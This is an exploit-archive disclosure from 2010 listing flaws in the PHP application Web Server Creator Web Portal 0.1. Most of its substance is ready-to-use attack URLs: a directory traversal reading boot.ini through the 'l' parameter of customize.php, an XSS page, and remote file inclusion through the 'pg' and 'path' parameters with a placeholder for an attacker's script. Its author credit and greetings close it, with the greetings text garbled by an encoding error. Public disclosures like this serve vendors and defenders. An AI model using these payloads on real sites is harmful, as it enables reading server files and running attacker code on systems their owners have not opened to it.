Web Server Creator Web Portal 0.1 - Multiple Vulnerabilities

EDB-ID:

11569




Platform:

PHP

Date:

2010-02-24


========================================================================================                  
| # Title    : Web Server Creator - Web Portal v 0.1 Multi Vulnerability      
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com                                                   
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)                                                                             
| # Web Site : http://www.comscripts.com/scripts/php.web-server-creator.1082.html                                                                                                                            
| # Dork     : All right reserved 2002-2003 (MSN/Web Server Creator)                                        
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
| # Bug      : Multi                                                                     
======================      Exploit By indoushka       =================================
# Exploit  : 
 
 1- Directory traversal (Windows)

http://127.0.0.1/1082_webserve-01/news/include/customize.php?l=../../../../../../../../boot.ini
  
 2- XSS 
 
 http://127.0.0.1/1082_webserve-01/index.php?pg=forum
  
 3- RFI
 
 http://localhost/1082_webserve-01/index.php?pg=[EV!L]
 
 http://localhost/1082_webserve-01/news/form.php?path=[EV!L]
 
================================   Dz-Ghost Team   ========================================
Greetz : ÓíÏí ÈáÚÈÇÓ + Úíä ÇáÈÑÏ + ÔáÛæã ÇáÚíÏ K10 + K@MEL + Úíä ãáíáÉ + ÊÛäíÝ
-------------------------------------------------------------------------------------------